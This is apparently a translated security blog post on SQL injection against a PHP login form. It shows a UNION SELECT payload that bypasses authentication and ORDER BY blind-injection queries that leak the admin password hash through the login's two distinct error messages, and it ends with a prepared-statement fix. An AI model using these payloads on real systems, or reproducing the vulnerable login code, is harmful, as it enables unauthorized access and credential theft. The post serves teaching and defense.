Blind injection using ORDER BY

Category: 颓废's Blog

Login code:

```php
<?php
$username = $_POST['username'];
$password = $_POST['password'];
if(filter($username)){
    // filter() is not shown in the post; it is meant to catch parentheses
}else{
    // $username is concatenated straight into the query: this is the injection point
    $sql="SELECT * FROM admin WHERE username='".$username."'";
    $result=mysql_query($sql);
    @$row = mysql_fetch_array($result);
    // only the first returned row is examined
    if(isset($row) && $row['username'] === 'admin'){
        if ($row['password']===md5($password)){
            //Login successful
        }else{
            die("password error!");
        }
    }else{
        die("username does not exist!");
    }
}
```

The table is as follows:

```
mysql> select * from admin where username='admin';
+----+----------+----------------------------------+
| id | username | password                         |
+----+----------+----------------------------------+
|  1 | admin    | 51b7a76d51e70b419f60d3473fb6f900 |
+----+----------+----------------------------------+
1 row in set (0.00 sec)
```

This is a common scenario: when a user logs in, a wrong username produces the message "username error", and a correct username with a wrong password produces "password error".

Logging in with UNION SELECT

The first idea on seeing this logic is naturally to forge the password with a UNION SELECT and log in directly:

```
username=' union select 1,'admin','c4ca4238a0b923820dcc509a6f75849b&password=1
```

```
mysql> select * from admin where username='' union select 1,'admin','c4ca4238a0b923820dcc509a6f75849b';
+----+----------+----------------------------------+
| id | username | password                         |
+----+----------+----------------------------------+
|  1 | admin    | c4ca4238a0b923820dcc509a6f75849b |
+----+----------+----------------------------------+
1 row in set (0.00 sec)
```

But what if we want to obtain the password itself?

The login messages give us a boolean condition; the question is how ORDER BY can make use of it:

```
mysql> select * from admin where username='' or 1 union select 1,2,'5' order by 3;
+----+----------+----------------------------------+
| id | username | password                         |
+----+----------+----------------------------------+
|  1 | 2        | 5                                |
|  1 | admin    | 51b7a76d51e70b419f60d3473fb6f900 |
+----+----------+----------------------------------+
2 rows in set (0.00 sec)

mysql> select * from admin where username='' or 1 union select 1,2,'6' order by 3;
+----+----------+----------------------------------+
| id | username | password                         |
+----+----------+----------------------------------+
|  1 | admin    | 51b7a76d51e70b419f60d3473fb6f900 |
|  1 | 2        | 6                                |
+----+----------+----------------------------------+
2 rows in set (0.01 sec)

mysql> select * from admin where username='' or 1 union select 1,2,'51' order by 3;
+----+----------+----------------------------------+
| id | username | password                         |
+----+----------+----------------------------------+
|  1 | 2        | 51                               |
|  1 | admin    | 51b7a76d51e70b419f60d3473fb6f900 |
+----+----------+----------------------------------+
2 rows in set (0.00 sec)

mysql> select * from admin where username='' or 1 union select 1,2,'52' order by 3;
+----+----------+----------------------------------+
| id | username | password                         |
+----+----------+----------------------------------+
|  1 | admin    | 51b7a76d51e70b419f60d3473fb6f900 |
|  1 | 2        | 52                               |
+----+----------+----------------------------------+
2 rows in set (0.00 sec)
```

Because the login code only inspects the first row returned, which of the two error messages comes back reveals whether the injected value sorts before or after the stored hash; judging the password character by character in this way yields the whole value.

Obviously this method is rarely used in practice, but it may be useful in certain specific environments, for example a lab environment where parentheses are filtered: most other blind injection techniques are then essentially useless, and ORDER BY can be used for the injection instead.
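As an added example that is not part of the original post, here is the login code above rewritten with a prepared statement and a single failure message, which removes both the injection point and the username/password oracle. It assumes an open mysqli connection in `$db` and the same `admin` table, but with the password column holding `password_hash()` output rather than MD5.

```php
<?php
// Added example, not code from the original post.
// Assumes: $db is an open mysqli connection; the `admin` table exists as in the
// post, but its password column stores password_hash() values instead of MD5.
function login(mysqli $db, string $username, string $password): bool
{
    // The `?` placeholder is bound below, so quotes, UNION SELECT or ORDER BY
    // inside $username reach MySQL as a literal string value, never as SQL.
    $stmt = $db->prepare('SELECT username, password FROM admin WHERE username = ?');
    $stmt->bind_param('s', $username);
    $stmt->execute();
    $stmt->bind_result($dbUser, $dbHash);
    $found = $stmt->fetch();
    $stmt->close();

    // Unknown user or non-admin: report exactly the same result as a wrong
    // password, so the response no longer distinguishes the two cases.
    if ($found !== true || $dbUser !== 'admin') {
        return false;
    }
    // Constant-time check against the stored salted hash.
    return password_verify($password, $dbHash);
}

// The caller prints one message for every failure.
if (!login($db, $_POST['username'] ?? '', $_POST['password'] ?? '')) {
    die('login failed');
}
// Login successful
```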

Original article: http://p0sec.net/index.php/archives/106/
